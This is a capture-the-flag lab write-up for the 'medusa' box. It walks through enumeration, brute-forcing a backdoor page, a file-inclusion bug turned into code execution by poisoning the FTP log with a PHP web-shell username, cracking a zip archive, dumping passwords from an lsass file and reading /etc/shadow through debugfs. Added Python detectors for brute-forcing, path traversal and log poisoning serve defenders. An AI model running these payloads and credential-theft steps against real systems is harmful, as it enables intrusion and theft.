【OSCP】medusa

admin, 2024-04-23 01:37:07

OSCP labs


Box overview

medusa

easy

Backdoor password brute-forcing, subdomain enumeration, gobuster fuzz for parameter discovery, file inclusion combined with the FTP service to poison the log and get a shell, using zip2john, using pypykatz, lsass.DMP dump parsing, cracking shadow with John the Ripper

Information gathering

Host discovery

nmap -sn 192.168.31.0/24

Port scanning

┌──(root㉿kali)-[~]
└─# nmap -sV -A -p- -T4 192.168.31.210
Starting Nmap 7.94 ( https://nmap.org ) at 2024-01-13 11:17 EST
Nmap scan report for medusa (192.168.31.210)
Host is up (0.00072s latency).
Not shown: 65532 closed tcp ports (reset)
PORT STATE SERVICE VERSION
21/tcp open ftp vsftpd 3.0.3
22/tcp open ssh OpenSSH 8.4p1 Debian 5+deb11u1 (protocol 2.0)
| ssh-hostkey:
| 3072 70:d4:ef:c9:27:6f:8d:95:7a:a5:51:19:51:fe:14:dc (RSA)
| 256 3f:8d:24:3f:d2:5e:ca:e6:c9:af:37:23:47:bf:1d:28 (ECDSA)
|_ 256 0c:33:7e:4e:95:3d:b0:2d:6a:5e:ca:39:91:0d:13:08 (ED25519)
80/tcp open http Apache httpd 2.4.54 ((Debian))
|_http-server-header: Apache/2.4.54 (Debian)
|_http-title: Apache2 Debian Default Page: It works
MAC Address: 08:00:27:DA:98:4C (Oracle VirtualBox virtual NIC)
Device type: general purpose
Running: Linux 4.X|5.X
OS CPE: cpe:/o:linux:linux_kernel:4 cpe:/o:linux:linux_kernel:5
OS details: Linux 4.15 - 5.8
Network Distance: 1 hop
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE
HOP RTT ADDRESS
1 0.72 ms medusa (192.168.31.210)

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 16.93 seconds

Directory scanning

┌──(root㉿kali)-[~]
└─# gobuster dir -w /opt/SecLists/Discovery/Web-Content/directory-list-2.3-medium.txt -u http://192.168.31.210 -x php,txt,html -e
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://192.168.31.210
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /opt/SecLists/Discovery/Web-Content/directory-list-2.3-medium.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.6
[+] Extensions: php,txt,html
[+] Expanded: true
[+] Timeout: 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
http://192.168.31.210/.php (Status: 403) [Size: 279]
http://192.168.31.210/.html (Status: 403) [Size: 279]
http://192.168.31.210/index.html (Status: 200) [Size: 10674]
http://192.168.31.210/manual (Status: 301) [Size: 317] [--> http://192.168.31.210/manual/]
http://192.168.31.210/.html (Status: 403) [Size: 279]
http://192.168.31.210/.php (Status: 403) [Size: 279]
http://192.168.31.210/server-status (Status: 403) [Size: 279]
http://192.168.31.210/hades (Status: 301) [Size: 316] [--> http://192.168.31.210/hades/]
Progress: 882240 / 882244 (100.00%)
===============================================================
Finished
===============================================================

Scanning the /hades subdirectory turned up door.php, which matches the hint on the home page.

This is a backdoor file, and its password still has to be brute-forced.

The brute-force ran for a long time without success; it later succeeded with Kraken. Once in, the page reveals a domain name.

wfuzz -c -w /usr/share/wordlists/rockyou.txt -u http://192.168.31.210/hades/door.php -d "word=FUZZ" --hc 200
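
From the defender's side, a wordlist attack like this one against door.php is loud in the Apache access log. The following is an added example, not code from the original post: it parses combined-format access-log lines and flags any client that sends more than a threshold of POSTs to /hades/door.php inside a sliding 60-second window. The log lines, client addresses and the "Wfuzz/3.1.0" user agent are constructed sample data.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Apache "combined" format: ip ident user [time] "METHOD path proto" status ...
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+)[^"]*" (?P<status>\d{3})'
)


def parse_line(line):
    """Return (ip, timestamp, method, path, status) or None if the line is malformed."""
    m = LOG_RE.match(line)
    if m is None:
        return None
    ts = datetime.strptime(m.group("ts"), "%d/%b/%Y:%H:%M:%S %z")
    return m.group("ip"), ts, m.group("method"), m.group("path"), int(m.group("status"))


def find_password_guessing(lines, path="/hades/door.php", method="POST",
                           threshold=20, window_s=60):
    """Return {ip: peak_count} for clients whose requests to `path` exceed
    `threshold` inside any sliding window of `window_s` seconds."""
    per_ip = defaultdict(list)
    for line in lines:
        rec = parse_line(line)
        if rec is None:
            continue
        ip, ts, meth, pth, _status = rec
        if meth == method and pth.split("?", 1)[0] == path:
            per_ip[ip].append(ts)

    window = timedelta(seconds=window_s)
    hits = {}
    for ip, stamps in per_ip.items():
        stamps.sort()
        peak = start = 0
        for end, ts in enumerate(stamps):       # two-pointer sliding window
            while ts - stamps[start] > window:
                start += 1
            peak = max(peak, end - start + 1)
        if peak > threshold:
            hits[ip] = peak
    return hits


def constructed_access_log():
    """Constructed sample: 25 wordlist POSTs from one client in 25 seconds,
    plus a normal visitor who loads the index and tries the door once."""
    base = datetime(2024, 1, 13, 11, 40, 0)
    lines = []
    for i in range(25):
        stamp = (base + timedelta(seconds=i)).strftime("%d/%b/%Y:%H:%M:%S")
        lines.append(f'192.168.31.5 - - [{stamp} -0500] "POST /hades/door.php HTTP/1.1" '
                     f'200 612 "-" "Wfuzz/3.1.0"')
    lines.append('192.168.31.7 - - [13/Jan/2024:11:40:05 -0500] '
                 '"GET /index.html HTTP/1.1" 200 10674 "-" "Mozilla/5.0"')
    lines.append('192.168.31.7 - - [13/Jan/2024:11:40:09 -0500] '
                 '"POST /hades/door.php HTTP/1.1" 200 612 "-" "Mozilla/5.0"')
    return lines


if __name__ == "__main__":
    for ip, n in find_password_guessing(constructed_access_log()).items():
        print(f"{ip}: {n} POSTs to /hades/door.php within 60s")
```

The status code is deliberately ignored: with a backdoor like this every wrong guess answers 200, so request rate per client, not error rate, is the usable signal.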

Rescanning found nothing more either.

Subdomain scanning

ffuf -r -c -ic -w /opt/SecLists/Discovery/DNS/subdomains-top1million-110000.txt -H "HOST: FUZZ.medusa.hmv" -u 'http://192.168.31.210' -fs 10674

gobuster dir -w /opt/SecLists/Discovery/Web-Content/directory-list-2.3-medium.txt -u http://dev.medusa.hmv -x php,txt,html -e

Here the medusa image (medusa.jpg) turned out to contain steganographic data, but it needs a passphrase, and brute-forcing did not recover it.

stegseek --info medusa.jpg

Scanning the subdirectories revealed a rather useful one, /files.

This directory looks like command execution, but parameter fuzzing showed that it is actually a file inclusion.

gobuster fuzz -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -t 100 -u "http://dev.medusa.hmv/files/system.php?FUZZ=/etc/passwd" -b 400,404 --exclude-length 0
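
The root cause is that system.php hands the view parameter to a file include without constraining it, so it accepts /etc/passwd here and a log file later. The following added example is my own code, not the box's PHP: it shows the check a hardened include handler should make before touching the filesystem. The base directory /var/www/dev/files, the allowed suffixes and the probe names are assumptions for illustration.

```python
import os


class IncludeRejected(ValueError):
    """Raised when a user-supplied file name must not be included."""


def resolve_view(base_dir, requested, allowed_suffixes=(".txt", ".html")):
    """Map a user-controlled `view` value to a file strictly inside base_dir.

    Rejects what file-inclusion payloads rely on: absolute paths, stream
    wrappers, NUL bytes, ../ traversal (checked on the canonical path, so
    symlinks cannot help), and disallowed file types.
    """
    if not requested or "\x00" in requested:
        raise IncludeRejected("empty name or embedded NUL byte")
    if "://" in requested:
        raise IncludeRejected("stream wrapper not allowed")
    if os.path.isabs(requested):
        raise IncludeRejected("absolute path not allowed")

    base = os.path.realpath(base_dir)
    target = os.path.realpath(os.path.join(base, requested))
    # The canonical target must sit below the canonical base directory.
    if os.path.commonpath([base, target]) != base or target == base:
        raise IncludeRejected("path escapes the include directory")
    if not target.endswith(allowed_suffixes):
        raise IncludeRejected("file type not allowed")
    return target


def is_accepted(base_dir, requested):
    """True if resolve_view would serve the name, False if it rejects it."""
    try:
        resolve_view(base_dir, requested)
    except IncludeRejected:
        return False
    return True


# Assumed document root for the /files/ directory (illustrative value).
BASE_DIR = "/var/www/dev/files"

# Constructed probe values: the ones used in the write-up plus common variants.
PROBES = [
    "readme.txt",                       # legitimate file under /files
    "/etc/passwd",                      # absolute path (the fuzzing hit)
    "/var/log/vsftpd.log",              # the log file the curl call included
    "../../../../etc/passwd",           # traversal
    "php://filter/resource=readme.txt", # wrapper
    "readme.txt\x00.php",               # NUL-byte truncation attempt
    "shell.php",                        # wrong type even if it is in /files
]

if __name__ == "__main__":
    for name in PROBES:
        verdict = "serve" if is_accepted(BASE_DIR, name) else "reject"
        print(f"{name!r:40} -> {verdict}")
```

The two realpath calls are the important part: comparing the canonical target against the canonical base is what makes the traversal check hold even when a symlink under /files points elsewhere.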

Gaining access

From here the FTP log can be read.

When logging in to FTP, we enter <?php system($_REQUEST['cmd']); ?> as the username. vsftpd writes the failed login, username included, to its log, which poisons the FTP log; including that log through the file-inclusion bug then executes the PHP:

Name (192.168.31.210:root): <?php system($_REQUEST['cmd']); ?>
331 Please specify the password.
Password:
530 Login incorrect.
ftp: Login failed
ftp> exit
221 Goodbye.

curl "http://dev.medusa.hmv/files/system.php?view=/var/log/vsftpd.log&cmd=id"
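
On the blue-team side a poisoned vsftpd.log is easy to spot, because the injected PHP lands in the username field of a FAIL LOGIN record. The following added example, not part of the original post, scans lines laid out like vsftpd's default log format and reports login attempts whose username carries PHP or shell-execution markers. The four records are constructed for the example, pid values and client addresses included.

```python
import re

# Layout of vsftpd's default (non-xferlog) records, for example
#   Sat Jan 13 11:50:02 2024 [pid 1234] [alice] OK LOGIN: Client "192.168.31.7"
# The username sits in the second bracket and is written verbatim, which is
# exactly why a PHP tag typed at the "Name" prompt ends up in the file.
VSFTPD_RE = re.compile(
    r'^(?P<ts>\w{3} \w{3} +\d{1,2} \d\d:\d\d:\d\d \d{4}) \[pid \d+\] '
    r'(?:\[(?P<user>.*?)\] )?(?P<event>OK LOGIN|FAIL LOGIN|CONNECT): Client "(?P<ip>[^"]+)"'
)

# Markers that have no business in a username; a hit means code, not a user.
MARKERS = ("<?", "?>", "$_", "system(", "passthru(", "shell_exec(", "eval(",
           "base64_decode(", "`")


def parse_vsftpd_line(line):
    """Return a dict with ts, user, event, ip for a login/connect record, else None."""
    m = VSFTPD_RE.match(line)
    return m.groupdict() if m else None


def find_poisoned_logins(lines):
    """Return the records whose username contains a code marker; the first
    marker that matched is attached under 'marker'."""
    hits = []
    for line in lines:
        rec = parse_vsftpd_line(line)
        if rec is None or not rec["user"]:
            continue
        for marker in MARKERS:
            if marker in rec["user"]:
                rec["marker"] = marker
                hits.append(rec)
                break
    return hits


# Constructed sample records (not a real log): a benign login and one failed
# login whose username is the payload quoted in the write-up.
CONSTRUCTED_LOG = [
    'Sat Jan 13 11:49:58 2024 [pid 1230] CONNECT: Client "192.168.31.7"',
    'Sat Jan 13 11:50:02 2024 [pid 1230] [alice] OK LOGIN: Client "192.168.31.7"',
    'Sat Jan 13 11:52:40 2024 [pid 1241] CONNECT: Client "192.168.31.5"',
    'Sat Jan 13 11:52:47 2024 [pid 1241] [<?php system($_REQUEST[\'cmd\']); ?>] '
    'FAIL LOGIN: Client "192.168.31.5"',
]

if __name__ == "__main__":
    for hit in find_poisoned_logins(CONSTRUCTED_LOG):
        print(f'{hit["ts"]}  {hit["ip"]}  {hit["event"]}  '
              f'marker={hit["marker"]!r}  user={hit["user"]!r}')
```

The username group is non-greedy and anchored on the following event keyword, so a payload that itself contains a closing bracket (as the one above does in $_REQUEST['cmd']) is still captured whole.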

A reverse shell then gives us a foothold on the box.

Privilege escalation

A linpeas.sh scan found a zip archive (old_files.zip).

After downloading it, we find it contains an lsass.dmp file, but the archive is password-protected. The zip hash (hash.txt, produced with zip2john) is cracked with john:

┌──(root㉿kali)-[~]
└─# john hash.txt --wordlist=/usr/share/wordlists/rockyou.txt
Using default input encoding: UTF-8
Loaded 1 password hash (ZIP, WinZip [PBKDF2-SHA1 128/128 AVX 4x])
Cost 1 (HMAC size) is 12386830 for all loaded hashes
Will run 4 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
medusa666 (old_files.zip/lsass.DMP)
1g 0:00:05:39 DONE (2024-01-14 01:30) 0.002948g/s 16691p/s 16691c/s 16691C/s meeker75..medabe15
Use the "--show" option to display all of the cracked passwords reliably
Session completed.

After extracting it we have the lsass.DMP dump; pypykatz pulls the password out of it.

pypykatz lsa minidump lsass.DMP
pypykatz lsa minidump lsass.DMP | grep -C2 "spectre"
INFO:pypykatz:Parsing file lsass.DMP
authentication_id 845877 (ce835)
session_id 7
username spectre
domainname Medusa-PC
logon_server MEDUSA-PC
--
luid 845877
== MSV ==
Username: spectre
Domain: Medusa-PC
LM: NA
--
DPAPI: NA
== WDIGEST [ce835]==
username spectre
domainname Medusa-PC
password 5p3ctr3_p0is0n_xX
password (hex)35007000330063007400720033005f00700030006900730030006e005f0078005800000000000000
== Kerberos ==
Username: spectre
Domain: Medusa-PC
Password: 5p3ctr3_p0is0n_xX
password (hex)35007000330063007400720033005f00700030006900730030006e005f0078005800000000000000
== WDIGEST [ce835]==
username spectre
domainname Medusa-PC
password 5p3ctr3_p0is0n_xX
password (hex)35007000330063007400720033005f00700030006900730030006e005f0078005800000000000000
== TSPKG [ce835]==
username spectre
domainname Medusa-PC
password 5p3ctr3_p0is0n_xX

With that password we log in as the spectre user and get the flag.

Open /dev/sda1 with debugfs and read the shadow file straight from the filesystem.

spectre@medusa:~$ /sbin/debugfs -w /dev/sda1
debugfs 1.46.2 (28-Feb-2021)
debugfs: cat /etc/shadow
root:$y$j9T$AjVXCCcjJ6jTodR8BwlPf.$4NeBwxOq4X0/0nCh3nrIBmwEEHJ6/kDU45031VFCWc2:19375:0:99999:7:::
daemon:*:19372:0:99999:7:::
bin:*:19372:0:99999:7:::
sys:*:19372:0:99999:7:::
sync:*:19372:0:99999:7:::
games:*:19372:0:99999:7:::
man:*:19372:0:99999:7:::
lp:*:19372:0:99999:7:::
mail:*:19372:0:99999:7:::
news:*:19372:0:99999:7:::
uucp:*:19372:0:99999:7:::
proxy:*:19372:0:99999:7:::
www-data:*:19372:0:99999:7:::
backup:*:19372:0:99999:7:::
list:*:19372:0:99999:7:::
irc:*:19372:0:99999:7:::
gnats:*:19372:0:99999:7:::
nobody:*:19372:0:99999:7:::
_apt:*:19372:0:99999:7:::
systemd-network:*:19372:0:99999:7:::
systemd-resolve:*:19372:0:99999:7:::
messagebus:*:19372:0:99999:7:::
systemd-timesync:*:19372:0:99999:7:::
sshd:*:19372:0:99999:7:::
spectre:$y$j9T$4TeFHbjRqRC9royagYTTJ/$KnU7QK1u0/5fpHHqE/ehPe6uqpwbs6vuvcQQH4EF9ZB:19374:0:99999:7:::
systemd-coredump:!*:19372::::::
ftp:*:19372:0:99999:7:::
debugfs:

Crack the shadow hashes with John the Ripper to get root.

john hash --wordlist=/usr/share/wordlists/rockyou.txt --format=crypt
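
Two checks a defender would run after reading this escalation path, as an added example that is not part of the original post: which non-root accounts can open the raw block device, and which shadow entries actually carry a crackable hash rather than a locked marker. The write-up does not say how spectre could run debugfs against /dev/sda1; the usual route is membership in the group that owns the device node, assumed here to be disk with mode 0660. The /etc/group lines are constructed; the shadow lines are copied from the debugfs output above.

```python
import stat

# Prefix of the crypt(3) hash -> scheme name (the $y$ seen above is yescrypt).
HASH_SCHEMES = {"$y$": "yescrypt", "$7$": "scrypt", "$6$": "sha512crypt",
                "$5$": "sha256crypt", "$2b$": "bcrypt", "$2y$": "bcrypt",
                "$1$": "md5crypt"}


def device_accessible_users(group_lines, dev_group, dev_mode, dev_owner="root"):
    """Return the sorted non-owner users who can read the block device, given
    the device node's owner, group and mode and the contents of /etc/group.
    A world-readable node is reported as ['*'] (everyone)."""
    if dev_mode & stat.S_IROTH:
        return ["*"]
    if not dev_mode & stat.S_IRGRP:
        return []
    for line in group_lines:
        name, _pw, _gid, members = line.strip().split(":", 3)
        if name == dev_group:
            users = {u for u in members.split(",") if u and u != dev_owner}
            return sorted(users)
    return []


def crackable_shadow_accounts(shadow_lines):
    """Return {user: scheme} for entries whose password field is a real hash,
    i.e. not empty and not locked ('!' / '*'), so an offline attack applies."""
    result = {}
    for line in shadow_lines:
        user, field = line.split(":", 2)[:2]
        if not field or field[0] in "!*":
            continue
        scheme = next((s for p, s in HASH_SCHEMES.items() if field.startswith(p)),
                      "unknown")
        result[user] = scheme
    return result


# Constructed /etc/group excerpt (assumption: spectre was added to disk).
GROUP_LINES = [
    "root:x:0:",
    "disk:x:6:spectre",
    "sudo:x:27:",
]

# Shadow entries copied from the debugfs output in the write-up.
SHADOW_LINES = [
    "root:$y$j9T$AjVXCCcjJ6jTodR8BwlPf.$4NeBwxOq4X0/0nCh3nrIBmwEEHJ6/kDU45031VFCWc2:19375:0:99999:7:::",
    "daemon:*:19372:0:99999:7:::",
    "www-data:*:19372:0:99999:7:::",
    "spectre:$y$j9T$4TeFHbjRqRC9royagYTTJ/$KnU7QK1u0/5fpHHqE/ehPe6uqpwbs6vuvcQQH4EF9ZB:19374:0:99999:7:::",
    "systemd-coredump:!*:19372::::::",
    "ftp:*:19372:0:99999:7:::",
]

if __name__ == "__main__":
    print("can read /dev/sda1:", device_accessible_users(GROUP_LINES, "disk", 0o660))
    print("crackable shadow hashes:", crackable_shadow_accounts(SHADOW_LINES))
```

Read access to the block device is the whole privilege: with it, file permissions on /etc/shadow never come into play, so the first check is the one that tells you whether this path is open on a host.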

End

Originally published on the WeChat public account 贝雷帽SEC: 【OSCP】medusa

Posted by admin on 2024-04-23 01:37:07. When reposting, keep the link to this article (CN-SEC, with thanks to the original author): https://cn-sec.com/archives/2679456.html
